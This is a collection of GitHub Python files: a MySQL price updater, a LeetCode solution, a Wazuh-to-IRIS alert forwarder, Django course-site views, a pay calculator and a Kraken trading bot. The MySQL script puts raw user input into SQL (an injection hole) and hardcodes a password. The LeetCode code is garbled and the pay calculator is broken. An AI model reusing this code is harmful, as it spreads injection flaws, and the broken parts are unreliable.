+{"seq_id":"73897859291","text":"import mysql.connector\nconn = mysql.connector.connect(\n host=\"localhost\",\n user=\"developer\",\n password=\"12\",\n database=\"dbpython\"\n)\n\ncursor = conn.cursor()\n\nnome_produto = input(\"Insira o nome do produto que deseja alterar:\")\npergunta = input(\"Deseja alterar o valor do produto:\")\nif pergunta == 'sim' or 's':\n print(\"***Lembre-se de não utilizar virgulas para definir o valor, e sim um ponto!***\")\n valor = input(\"Insira o novo valor do produto:\")\n comando = f'UPDATE vendas SET valor = {valor} WHERE nome_produto = \"{nome_produto}\"'\n cursor.execute(comando)\n conn.commit()\n print(\"As alterações foram feitas com sucesso!\")\n\nelse:\n print(\"O Serviço de update foi finalizado sem nenhuma modificação!\")\n\ncursor.close()\nconn.close()\n","repo_name":"CloudEducationBrazil/WydenPythonParadigmas","sub_path":"08 SourceCodePython/aula26032022/deividy/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"pt","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"}
+{"seq_id":"13633181703","text":"# Using Divide and Conquer\nclass Solution:\n def longestCommonPrefix(self, strs) -> str:\n def commonWordBetweenTwoWords(l_str,r_str):\n longest_prefix= min(len(l_str),len(r_str))\n i=0\n while i= end:\n return strs[start]\n else:\n mid_point= (start+end)//2\n left= help_recursion(str_list,start,mid_point)\n right= help_recursion(str_list,mid_point+1,end)\n return commonWordBetweenTwoWords(left,right)\n if len(strs) == 0:\n return \"\"\n else:\n return help(strs,0,len(strs)-1)\n \n \n ","repo_name":"ruifan831/leetCodeRecord","sub_path":"14_LongestCommonPrefix.py","file_name":"14_LongestCommonPrefix.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38167151767","text":"from os import getenv\n\n# Namespace grouping the project components and RabbitMQTrigger objects\nTRIGGERS_NAMESPACE = getenv('TRIGGERS_NAMESPACE')\n\n# Group of the trigger CRD\nTRIGGERS_GROUP = getenv('TRIGGERS_GROUP')\n\n# k8s ApiVersion of the trigger CRD\nTRIGGERS_VERSION = getenv('TRIGGERS_VERSION')\n\n# Plural name of the trigger CRD\nTRIGGERS_PLURAL = getenv('TRIGGERS_PLURAL')\n\n# Name of the secret containing the triggers store\nTRIGGERS_STORE_SECRET = getenv('TRIGGERS_PLURAL')\n\n# Key in which to store the triggers global state on the secret\nTRIGGERS_SECRET_KEY = 'triggers_store'\n\n# Deployment name of the RabbitMQ events proxy\nEVENTS_PROXY_DEPLOYMENT = getenv('EVENTS_PROXY_DEPLOYMENT')\n","repo_name":"ivanvmoreno/bachelor-project","sub_path":"rabbitmq-trigger-operator/app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"16729350005","text":"#!/usr/bin/env python3\n# custom-iris.py\n# Custom Wazuh integration script to send alerts to DFIR-IRIS\n\nimport sys\nimport json\nimport requests\nfrom requests.auth import HTTPBasicAuth\n\n# Function to search for and extract the \"message\" field\ndef find_message_field(data):\n if isinstance(data, dict):\n if \"message\" in data:\n return data[\"message\"]\n for key, value in data.items():\n result = find_message_field(value)\n if result is not None:\n return result\n elif isinstance(data, list):\n for item in data:\n result = find_message_field(item)\n if result is not None:\n return result\n return None\n\n# Read parameters when integration is run\nalert_file = sys.argv[1]\napi_key = sys.argv[2]\nhook_url = sys.argv[3]\n\n# Read the alert file\nwith open(alert_file) as f:\n alert_json = json.load(f)\n\n# Extract field information\nalert_id = alert_json[\"id\"]\nalert_timestamp = alert_json[\"timestamp\"]\nalert_level = alert_json[\"rule\"][\"level\"]\nalert_title = alert_json[\"rule\"][\"description\"]\nalert_description = find_message_field(alert_json[\"data\"])\nagent_name = alert_json[\"agent\"][\"name\"]\nagent_ip = alert_json[\"agent\"][\"ip\"]\nagent_id = alert_json[\"agent\"][\"id\"]\nrule_id = alert_json[\"rule\"][\"id\"]\nrule_fires = alert_json[\"rule\"][\"firedtimes\"]\nalert_data = alert_json[\"data\"]\nalert_message = find_message_field(alert_json[\"data\"])\n\n# Convert Wazuh rule levels -> IRIS severity\nif(alert_level < 5):\n severity = 2\nelif(alert_level >= 5 and alert_level < 7):\n severity = 3\nelif(alert_level >= 7 and alert_level < 10):\n severity = 4\nelif(alert_level >= 10 and alert_level < 13):\n severity = 5\nelif(alert_level >= 13):\n severity = 6\nelse:\n severity = 1\n\n# Generate request\n# Reference: https://docs.dfir-iris.org/_static/iris_api_reference_v2.0.1.html#tag/Alerts/operation/post-case-add-alert\npayload = json.dumps({\n \"alert_title\": alert_title,\n \"alert_description\": f\"\"\"Agent ID: {agent_id}\nAgent IP: {agent_ip}\nAgent Name: {agent_name}\n\nAlert Details: {alert_description}\n\"\"\",\n \"alert_source\": \"Wazuh\",\n \"alert_source_ref\": alert_id,\n \"alert_source_link\": \"WAZUH_URL\",\n \"alert_severity_id\": severity, \n \"alert_status_id\": 2, # 'New' status\n \"alert_source_event_time\": alert_timestamp,\n \"alert_note\": \"\",\n \"alert_tags\": \"wazuh,\" + agent_name,\n \"alert_customer_id\": 1, # '1' for default 'IrisInitialClient'\n \"alert_source_content\": alert_json # raw log\n})\n\n# Send request to IRIS\nresponse = requests.post(hook_url, data=payload, headers={\"Authorization\": \"Bearer \" + api_key, \"content-type\": \"application/json\"})\n\nsys.exit(0)\n","repo_name":"maikroservice/Wazuh-IRIS-integration","sub_path":"custom-iris.py","file_name":"custom-iris.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
+{"seq_id":"33835729908","text":"import pandas as pd\nfrom utils import limpar_texto\n\ndef carregar_nomes():\n nomes = pd.read_csv(\"dados/nomes.csv\")\n\n # Limpar first_name para busca\n nomes.first_name = nomes.first_name.apply(limpar_texto)\n\n return nomes\n\ndef obter_dados_por_nome(nomes, meu_nome):\n # Limpar meu_nome para busca\n meu_nome = limpar_texto(meu_nome)\n\n linha = nomes[nomes.first_name == meu_nome].iloc[0]\n \n return linha\n\ndef imprimir_saida(linha):\n texto_saida = f\"\"\"Nome: {linha.first_name}\nGênero: {linha.classification}\nProbabilidade: {linha.ratio}\nNomes alternativos: {linha.alternative_names}\"\"\"\n print(texto_saida)","repo_name":"ricardocarvalhods/projeto-zero","sub_path":"nomes.py","file_name":"nomes.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"5046306189","text":"from django.shortcuts import render\nfrom django.views.generic.base import View\nfrom django.db.models import Count, Avg, Max, Min, Sum\nfrom django.core.paginator import Paginator,EmptyPage,PageNotAnInteger\nfrom django.http.response import HttpResponse\n\nfrom Organization.models import CityDict,CourseOrg,Teacher\nfrom Courses.models import Course\nfrom Openation.models import UserFavorite\nfrom Organization.pager import CustomPaginator\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\nfrom Organization.ask_form import AskForm\n\n# class OrgList(View):\n# \"\"\"\n# 机构列表,不适用github的分页,我们应该怎么做\n# \"\"\"\n# def get(self,request):\n# city_list = CityDict.objects.all()\n# org_list = CourseOrg.objects.all()\n# #聚合函数\n# nums = CourseOrg.objects.aggregate(k=Count('id',distinct=True))\n#\n# #django内置的分页,用好这个,分页组件更好用了\n# # 全部数据:Org_LIST,=》得出共有多少条数据\n# # per_page: 每页显示条目数量\n# # count: 数据总个数\n# # num_pages:总页数\n# # page_range:总页数的索引范围,如: (1,10),(1,200)\n# # page: page对象(是否具有下一页;是否有上一页;)\n# current_page = request.GET.get('page')\n# # Paginator对象\n# paginator = CustomPaginator(current_page, 9, org_list, 3)\n# try:\n# # Page对象\n# posts = paginator.page(current_page)\n# # has_next 是否有下一页\n# # next_page_number 下一页页码\n# # has_previous 是否有上一页\n# # previous_page_number 上一页页码\n# # object_list 分页之后的数据列表,已经切片好的数据\n# # number 当前页\n# # paginator paginator对象\n# except PageNotAnInteger:\n# posts = paginator.page(1)\n# except EmptyPage:\n# posts = paginator.page(paginator.num_pages)\n#\n# return render(request,'org-list.html',{\n# 'city_list':city_list,\n# 'posts':posts,\n# 'nums':nums,\n# })\n\n#自定制的组件不够理想\n\n\nclass OrgList(View):\n \"\"\"\n 机构,这里这种做法,其实是不合理的\n 这里没有改他的代码了,前端不太好\n 这里是这个项目最难的地方\n \"\"\"\n def get(self, request):\n city_list = CityDict.objects.all()\n org_list = CourseOrg.objects.all()\n hot_org = org_list.order_by('-click_nums')[:5]\n #聚合函数\n city_id = request.GET.get('city',0)\n if city_id:\n org_list= org_list.filter(city_id=int(city_id)).select_related('city')\n else:\n org_list = org_list.filter().select_related('city')\n category = request.GET.get('ct','')\n if category:\n org_list = org_list.filter(category=category)\n else:\n org_list = org_list.filter()\n sorts = request.GET.get('sort','')\n if sorts:\n if sorts == 'students':\n org_list=org_list.order_by('-students')\n elif sorts == 'courses':\n org_list=org_list.order_by('-courses')\n nums = org_list.count()\n try:\n page = request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n # Provide Paginator with the request object for complete querystring generation\n\n #(5)每一页显示的数量\n p = Paginator(org_list,2, request=request)\n\n orgs = p.page(page)\n\n return render(request,'org-list.html',\n {\"city_list\":city_list,\n 'org_list':orgs,\n 'nums':nums,\n 'city_id':city_id,\n 'category':category,\n 'hot_org':hot_org,\n 'sort':sorts\n })\n\n\nclass UserAsk(View):\n '''\n 用户提交询问,用ajax方式提交\n '''\n def post(self,request):\n user_ask = AskForm(request.POST)\n if user_ask.is_valid():\n user_ask.save(commit=True)\n #第一种\n return HttpResponse(\"{'status':'success'}\",content_type='application/json')\n #第二种import json序列化\n else:\n return HttpResponse(\"{'status':'fail','msg':'访问出错'}\",content_type='application/json')\n\n\n#第一种方法\n# class OrgDetailHome(View):\n# def get(self,request,**kwargs):\n# for k,v in kwargs.items():\n# kwargs[k] = int(v)\n# org_id=kwargs.get('org_id',None)\n# org_course = CourseOrg.objects.filter(id = org_id).first()\n# course_detail = org_course.course_set.all()[:3]\n# 
return render(request,'org-homepage.html',{\"org_course\":org_course,\"course_detail\":course_detail})\n\n\n# class OrgDetailHome1(View):\n# \"\"\"\n# 差点自定义模板语言\n# \"\"\"\n# def get(self,request,org_id):\n# current_page = 'home'\n# courses_detail = Course.objects.filter(course_org__id = int(org_id)).values('name','image','students',\n# 'learn_time','course_org__name','course_org__image','fav_nums','desc','id')[:2]\n#\n# org_name = CourseOrg.objects.filter(id = int(org_id)).first()\n# teachers = org_name.teacher_set.all()[:2]\n# print(courses_detail)\n# return render(request,'org-homepage.html',{\"courses\":courses_detail,\"teachers\":teachers,\n# \"current_page\":current_page})\n\n\nclass OrgHomeView(View):\n \"\"\"\n 机构首页\n \"\"\"\n def get(self, request, org_id):\n current_page = \"home\"\n course_org = CourseOrg.objects.filter(id=int(org_id)).first()\n all_courses = course_org.course_set.all()[:3]\n all_teachers = course_org.teacher_set.all()[:1]\n has_fav = False\n print(request.user)\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n return render(request, 'org-homepage.html', {\n 'all_courses':all_courses,\n 'all_teachers': all_teachers,\n 'course_org':course_org,\n 'current_page':current_page,\n 'has_fav':has_fav,\n })\n\n\nclass OrgCourseView(View):\n \"\"\"\n 课程机构列表页\n \"\"\"\n\n def get(self, request, org_id):\n current_page = \"course\"\n course_org = CourseOrg.objects.filter(id=int(org_id)).first()\n all_courses = course_org.course_set.all()[:3]\n all_teachers = course_org.teacher_set.all()[:1]\n has_fav = False\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n return render(request, 'org-detail-course.html', {\n 'all_courses': all_courses,\n 'all_teachers': all_teachers,\n 'course_org': course_org,\n 'current_page': current_page,\n 'has_fav':has_fav\n })\n\n\nclass OrgDescView(View):\n\n def get(self, request, org_id):\n current_page = \"desc\"\n course_org = CourseOrg.objects.filter(id=int(org_id)).first()\n all_courses = course_org.course_set.all()[:3]\n all_teachers = course_org.teacher_set.all()[:1]\n has_fav = False\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n return render(request, 'org-detail-desc.html', {\n 'all_courses': all_courses,\n 'all_teachers': all_teachers,\n 'course_org': course_org,\n 'current_page': current_page,\n 'has_fav':has_fav,\n })\n\n\nclass OrgTeacherView(View):\n def get(self, request, org_id):\n current_page = \"teacher\"\n course_org = CourseOrg.objects.filter(id=int(org_id)).first()\n has_fav = False\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n all_courses = course_org.course_set.all()[:3]\n all_teachers = course_org.teacher_set.all()[:1]\n return render(request, 'org-detail-teachers.html', {\n 'all_courses': all_courses,\n 'all_teachers': all_teachers,\n 'course_org': course_org,\n 'current_page': current_page,\n 'has_fav':has_fav,\n })\n\n\nclass OrgFavView(View):\n \"\"\"用户收藏\"\"\"\n def post(self, request):\n fav_id = request.POST.get('fav_id', 0)\n fav_type = request.POST.get('fav_type', 0)\n\n if not request.user.is_authenticated():\n #判断用户登录状态\n print(request.user)\n return HttpResponse('{\"status\":\"fail\", \"msg\":\"用户未登录\"}', 
content_type='application/json')\n\n\n exist_records = UserFavorite.objects.filter(user=request.user, fav_id=int(fav_id), fav_type=int(fav_type))\n if exist_records:\n #如果记录已经存在, 则表示用户取消收藏\n exist_records.delete()\n if int(fav_type) == 1:\n course = Course.objects.get(id=int(fav_id))\n course.fav_nums -= 1\n if course.fav_nums < 0:\n course.fav_nums = 0\n course.save()\n elif int(fav_type) == 2:\n course_org = CourseOrg.objects.get(id=int(fav_id))\n course_org.fav_nums -= 1\n if course_org.fav_nums < 0:\n course_org.fav_nums = 0\n course_org.save()\n elif int(fav_type) == 3:\n teacher = Teacher.objects.get(id=int(fav_id))\n teacher.fav_nums -= 1\n if teacher.fav_nums < 0:\n teacher.fav_nums = 0\n teacher.save()\n return HttpResponse('{\"status\":\"success\", \"msg\":\"收藏\"}', content_type='application/json')\n else:\n user_fav = UserFavorite()\n if int(fav_id) > 0 and int(fav_type) > 0:\n user_fav.user = request.user\n user_fav.fav_id = int(fav_id)\n user_fav.fav_type = int(fav_type)\n user_fav.save()\n\n if int(fav_type) == 1:\n course = Course.objects.get(id=int(fav_id))\n course.fav_nums += 1\n course.save()\n elif int(fav_type) == 2:\n course_org = CourseOrg.objects.get(id=int(fav_id))\n course_org.fav_nums += 1\n course_org.save()\n elif int(fav_type) == 3:\n teacher = Teacher.objects.get(id=int(fav_id))\n teacher.fav_nums += 1\n teacher.save()\n\n return HttpResponse('{\"status\":\"success\", \"msg\":\"已收藏\"}', content_type='application/json')\n else:\n return HttpResponse('{\"status\":\"fail\", \"msg\":\"收藏出错\"}', content_type='application/json')\n\n\n\n\n","repo_name":"bulangdaoshi/lunix-","sub_path":"MXZX/app/Organization/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
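These class-based views get wired to URLs elsewhere in the project; a hypothetical urls.py along these lines (patterns and names are illustrative, not taken from the repo):

from django.conf.urls import url
from Organization.views import OrgList, OrgHomeView, OrgFavView

urlpatterns = [
    url(r'^list/$', OrgList.as_view(), name='org_list'),
    url(r'^home/(?P<org_id>\d+)/$', OrgHomeView.as_view(), name='org_home'),
    url(r'^add_fav/$', OrgFavView.as_view(), name='org_fav'),
]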
+{"seq_id":"21255708194","text":"def computepay(hoursworked, payrate):\r\n #Variables\r\n totalpay = 0\r\n regularhours = 0\r\n overtimehours = 0\r\n regulartimelimit = 40\r\n regularpay = 0\r\n overtimepay = 0\r\n time_half = 1.5\r\n \r\n \r\n #If statement\r\n if hoursworked > regulartimelimit:\r\n regularhours = regulartimelimit\r\n overtimehours = hoursworked - Regulartimelimit\r\n \r\n else:\r\n regularhours = hoursworked\r\n overtimehours = 0\r\n \r\n regular = regularhours * payrate\r\n overtimepay = overtimehours * payrate * time_half\r\n \r\n totalpay = regularpay + overtimepay\r\n return totalpay\r\n#Calling the function\r\nprint (computepay(52, 20))\r\n ","repo_name":"Definitive-edition/Programming-for-IT-Problem-set-3","sub_path":"Exercise 6.py","file_name":"Exercise 6.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"12282658960","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 31 22:54:47 2017\n\n@author: dboudeau\n\"\"\"\nimport exchange_krakken as kraken\nimport time,os\nimport persistenceHandler\nimport logging\nimport businessLogic\nimport notifier\nimport math\n\n\n# TODO Creer des classes traders/closed order car la c'est de la pure MERDE\n# TODO Unifier les differentes methodes qui appellent open and close orders. Il y en a plein ca sert à rien\n# TODO SI N ORDRE DE VENTE MANQUE IL FAUT GERER CA ! cf requete unclosed trade\n# TODO Chaque appel de open ou closed order devrait amener a un update de la table close\n\n# Var initialization\nAUTHORIZATION_OF_BUYING=bool(os.environ['AUTHORIZATION_OF_BUYING']=='True')\n# XRP -> XXRPZEUR LTC -> XLTCZEUR ETC -> XETCZEUR\nCURRENCY_CRAWLED_NAME=os.environ['CURRENCY_CRAWLED_NAME']\n# XRP -> XRPEUR LTC -> LTCEUR ETC -> ETCEUR\nCURRENCY_ORDER_NAME=os.environ['CURRENCY_ORDER_NAME']\n# XRP -> XXRP LTC -> XLTC ETC -> XETC\nCURRENCY_BALANCE_NAME=os.environ['CURRENCY_BALANCE_NAME']\n\nNOTIFY_ON_CLOSED_ORDERS=bool(os.environ['NOTIFY_ON_CLOSED_ORDERS']=='True')\n\n# Logging Management\nlogger = logging.getLogger(__name__)\nhandler = logging.StreamHandler()\nformatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\nlogger.setLevel(logging.DEBUG)\n\n\nkraken.init()\nlist_open_orders=kraken.get_single_open_orders(CURRENCY_ORDER_NAME)\nDONE=0\nNOT_DONE=1\n\n####################11\n# Initialize traders\nWAITING='wait'\nSELLING='sell'\nBUYING='buy'\nCLOSED='closed'\nCANCELED='canceled'\n\nsequence_number=-1\ndef increment_sequence():\n global sequence_number\n sequence_number=sequence_number+1\n return sequence_number\n\n##############################################################\n# TRADING SETUP \n##############################################################\nALLOWED_BUDGET=float(os.environ['ALLOWED_BUDGET'])\nEXPECTED_BENEFIT_BY_TRADER=float(os.environ['EXPECTED_BENEFIT_BY_TRADER'])\nNB_OF_TRADERS=int(os.environ['NB_OF_TRADERS'])\nSTEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE=float(os.environ['STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE'])\nMIN_BUYING_PRICE=float(os.environ['MIN_BUYING_PRICE'])\nMAX_BUYING_PRICE=float(os.environ['MAX_BUYING_PRICE'])\n\nBUDGET_BY_TRADER_LIST=os.environ['BUDGET_BY_TRADER_LIST']\ntemp=BUDGET_BY_TRADER_LIST.split(',')\nBUDGET_BY_TRADER_LIST = []\nfor item in temp:\n BUDGET_BY_TRADER_LIST.append(float(item))\n\nlist_trader=[]\nbuying_price=MAX_BUYING_PRICE\nfor index in range(0,NB_OF_TRADERS):\n # trader (integerId,budget(€),buy_unit_price,buying_order,Status,available_budget,engaged_budget\n list_trader.append([increment_sequence(),BUDGET_BY_TRADER_LIST[index],buying_price,None,WAITING,0.0,0.0])\n buying_price=round(buying_price-STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,1)\nif(list_trader[NB_OF_TRADERS-1][2]!=MIN_BUYING_PRICE):\n logger.error(\"Something wrong in configuration, minimum buying price (\"+str(MIN_BUYING_PRICE)+\") different from settings (\"+str(list_trader[NB_OF_TRADERS-1][2])+\")\")\n exit(1)\n\n##################################################################\n# COMMON FUNCTIONS\n##################################################################\n \n\ndef safetyCheckOnTradingCurrencySellingOrder(open_orders,owned_volume_of_traded_money):\n logger.info('On initizalization or after cancel order, check if there is no missing selling order')\n sold_volume=0.0\n for order in open_orders:\n 
if(order.get('type')==SELLING):\n sold_volume=sold_volume+order.get('vol')\n if(abs(owned_volume_of_traded_money - (sold_volume+0.1))>=0.5):\n \n # Particular case : If there is a buying/selling order partially processed, amount can be slightly different:\n logger.info(\"88 Checking for partial orders \")\n sum_buying_partial_selling=0.0\n sum_buying_partial_buying=0.0\n for item in open_orders:\n if (item.get('vol_exec')>0.0):\n if(item.get('type')==SELLING):\n logger.info(\"89-1 Adding \"+str(item.get('vol_exec'))+\" from SELLING order \"+item.get('order_id'))\n sum_buying_partial_selling=sum_buying_partial_selling+item.get('vol_exec')\n else:\n logger.info(\"89-2 Adding \"+str(item.get('vol_exec'))+\" from BUYING order \"+item.get('order_id'))\n sum_buying_partial_buying=sum_buying_partial_buying+item.get('vol_exec')\n \n logger.info(\" Sum partial BUYING order \"+str(sum_buying_partial_buying))\n logger.info(\" Sum partial SELLING order \"+str(sum_buying_partial_selling))\n logger.info(\" Sum of owned_volume_of_traded_money=\"+str(owned_volume_of_traded_money))\n logger.info(\" Sum of sold coins=\"+str(sold_volume))\n logger.info(\" Real sold =\"+str(sold_volume - sum_buying_partial_selling + sum_buying_partial_buying))\n \n \n if(abs(owned_volume_of_traded_money - (round( (sold_volume - sum_buying_partial_selling + sum_buying_partial_buying) ,1) ) )>=0.1):\n logger.info(CURRENCY_BALANCE_NAME+\" Sanity check error (Even with partial orders\")\n notifier.notify('Safety Check failed',CURRENCY_BALANCE_NAME+\" Sanity check error (Even with partial orders)\")\n exit(1)\n else:\n logger.info(CURRENCY_BALANCE_NAME+\" owned volume on exchange (\"+str(owned_volume_of_traded_money)+\") are all in sell mode (\"+str(round( (sold_volume - sum_buying_partial_selling + sum_buying_partial_buying) ,1))+\").Good to go.\")\n\n else:\n logger.info(CURRENCY_BALANCE_NAME+\" owned volume on exchange (\"+str(owned_volume_of_traded_money)+\") are all in sell mode (\"+str(sold_volume)+\").Good to go.\")\n \n # Checking number of open buying orders :\n counter_open_buying_order=0\n for open_order in open_orders:\n if(open_order.get('type')==BUYING):\n counter_open_buying_order=counter_open_buying_order+1\n \n # Test number of buying orders\n if(counter_open_buying_order>1):\n logger.error(\"More than 1 buying order detected\")\n notifier.notify(\"Fatal Error\",\"More than 1 buying order detected\"+str(open_order))\n logger.error(\"Exiting\")\n exit(1) \n \n\ndef calculatedEngagedMoney(volume,unit_sell_price,step_between_unit_sell_and_unit_price):\n buy_trade=volume * round(unit_sell_price-step_between_unit_sell_and_unit_price,2)\n fees=businessLogic.calculate_fee(volume * round(unit_sell_price-step_between_unit_sell_and_unit_price,2))\n engaged_money=math.ceil(buy_trade + fees)\n logger.info(\"Volume buyed was \"+str(volume) +\" at \"+str(round(unit_sell_price-step_between_unit_sell_and_unit_price,2) ))\n logger.info(\" fees were \"+str(fees) )\n logger.info(\" so (ceiled) engaged money was \"+str(float(round(buy_trade + fees,2))) )\n return float(engaged_money)\n\n# Ratio should be different\ndef budgetCalculation(list_trader,number_of_traders,logs=False):\n logger.info(\"------Begin calculating the budget for each trader before buying----\")\n available_budget=0\n for index in range(0,number_of_traders):\n # Define the ratio of the above(s) free traders which is allowed by below traders\n RATIO_OF_ABOVE_BUDGET_ALLOCATED=round((index+1)/number_of_traders,2)\n \n if(list_trader[index][4]==WAITING):\n 
list_trader[index][5]=round( (available_budget * RATIO_OF_ABOVE_BUDGET_ALLOCATED ) + list_trader[index][1] ,1)\n available_budget=available_budget+list_trader[index][1]\n else:\n list_trader[index][5]=0.0\n\n # Engaged money\n if(list_trader[index][6]>0 and list_trader[index][6]list_trader[index][2] and open_selling_order.get('price')<=round(list_trader[index][2]+STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,2)):\n logger.info('Mapping order '+open_selling_order.get('order_id')+' - '+str(open_selling_order.get('price'))+' to trader '+str(list_trader[index][0]))\n logger.info('Trader '+str(index)+' ( '+str(list_trader[index][2])+' -> '+str(round(list_trader[index][2]+STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,2))+')') \n is_order_mapped=True\n # Set up the trader with new status\n list_trader[index][3]=open_selling_order.get('order_id')\n list_trader[index][4]=SELLING\n list_trader[index][5]=0.0\n # Engaged money is selling volume*unit buy_price + fees\n list_trader[index][6]=calculatedEngagedMoney(open_selling_order.get('vol'),list_trader[index][2],STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE)\n if(is_order_mapped):\n break;\n if is_order_mapped==False:\n logger.info('Order '+open_selling_order.get('order_id')+' is NOT MAPPED')\n\n# Calculate budget for further tests\nlist_trader=budgetCalculation(list_trader,NB_OF_TRADERS,logs=True)\n\n\n# Check that budget available on exchange is compliant \ntest_required_budget=list_trader[NB_OF_TRADERS-1][5]\ntest_available_budget=kraken.get_balance_EUR()\n\nif(test_available_budget0):\n is_buying_order_canceled_and_partially_executed=True\n \n opening_date=str(coe.get('opentm'))\n closing_date=str(coe.get('closetm'))\n\n # Don't send notification and dont store cancel order\n if(status!=CANCELED or is_buying_order_canceled_and_partially_executed==True):\n # Notify\n if(NOTIFY_ON_CLOSED_ORDERS==True):\n specific_text=\"\"\n if(is_buying_order_canceled_and_partially_executed==True):\n specific_text=\"PARTIALLY EXECUTED CANCEL \"\n notifier.notify(specific_text+'Order '+oe.get('order_id')+' '+str.upper(status),descr)\n\n logger.info('Order '+oe.get('order_id')+' '+str.upper(status)+\" \"+descr)\n \n # If an BUY order was CLOSED( or CANCELED but partially processed), search the concerned speculator to create sell order\n if(oe.get('type')==BUYING or oe.get('type')==SELLING):\n logger.info(\"order \"+str(oe.get('order_id'))+\" just closed, searching trader\")\n for index in range(0,NB_OF_TRADERS):\n if(list_trader[index][4]==BUYING and list_trader[index][3]==oe.get('order_id') and (status==CLOSED or is_buying_order_canceled_and_partially_executed==True) ):\n logger.info(\"1/ \"+str(BUYING)+\" order \"+oe.get('order_id')+\" was originally created by trader \"+str(index)+\".\")\n if(is_buying_order_canceled_and_partially_executed==True):\n logger.info(\"- Specific case of selling order creation after cancelation of partially executed buying order\")\n ########################\n # CREATING SELLING ORDER\n ########################\n # Get available amount of currency\n volume_buyed_to_sell=kraken.get_closed_order_volume_by_id(oe.get('order_id'),persistenceHandler,STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE)\n logger.info(\"Volume to sell is :\"+str(volume_buyed_to_sell))\n if(volume_buyed_to_sell>0.0):\n unit_selling_price=round(list_trader[index][2]+STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,2)\n logger.info(\"Unit sell price is:\"+str(unit_selling_price))\n # Selling order: 
secure_sell(volume,price,currency_crawling_name,persistenceHandler,current_step_between_buy_and_sell,CURRENCY_ORDER_NAME)\n created_selling_order=kraken.secure_sell(volume_buyed_to_sell,unit_selling_price,CURRENCY_CRAWLED_NAME,persistenceHandler,STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,CURRENCY_ORDER_NAME)\n fresh_open_orders.append(created_selling_order)\n list_trader[index][3]=created_selling_order.get('order_id')\n list_trader[index][4]=SELLING\n list_trader[index][5]=0.0\n # Setting engaged money\n list_trader[index][6]=calculatedEngagedMoney(volume_buyed_to_sell,unit_selling_price,STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE)\n logger.info(\"Trader \"+str(list_trader[index][0])+\" is now in mode\"+str(list_trader[index][4])+\" with order \"+str(list_trader[index][3])+\". Budget is :\"+str(list_trader[index][5]))\n break;\n if(list_trader[index][3]==oe.get('order_id') and ((list_trader[index][4]==SELLING) or ((list_trader[index][4]==BUYING) and (status==CANCELED)))):\n logger.info(\"2/ \"+str(list_trader[index][4])+\" order \"+oe.get('order_id')+\" was originally created by trader \"+str(index)+\".\")\n ####################################################\n # MANAGE SELL ENJOYMENT, OR BUY CANCELATION\n ####################################################\n flag_benefit=False\n if(list_trader[index][4]==SELLING):\n flag_benefit=True\n \n list_trader[index][3]=None\n list_trader[index][4]=WAITING\n # Budget will be calculated in the iteration\n list_trader[index][5]=0.0\n list_trader[index][6]=0.0\n logger.info(\"Trader \"+str(list_trader[index][0])+\" is now in mode\"+str(WAITING))\n \n # Special notification if to give you benefits\n if(flag_benefit):\n try:\n benefits=businessLogic.estimate_benefits(list_trader[index][2],volume,round(list_trader[index][2]+STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,2))\n todays_benefits=businessLogic.calculate_today_benefits(persistenceHandler.get_todays_benefits())\n logger.info(\"Todays Benefits are \"+str(todays_benefits))\n notifier.notify(\";) Congrats\",\"If configuration did t change, Benefits are little bit under \"+str(benefits)+\"€\\nTotal for today :\"+str(todays_benefits[1])+\"€ (in \"+str(todays_benefits[0])+\" trades)\")\n logger.info(\"CONGRATULATIONS !!! Benefits are little bit under \"+str(benefits)+\"€\")\n logger.info(\"---------------------Total for today-> \"+str(todays_benefits[1])+\"€ (\"+str(todays_benefits[0])+\" trades)\")\n except Exception as e:\n logger.info(\"fail to send Special notification for benefit. 
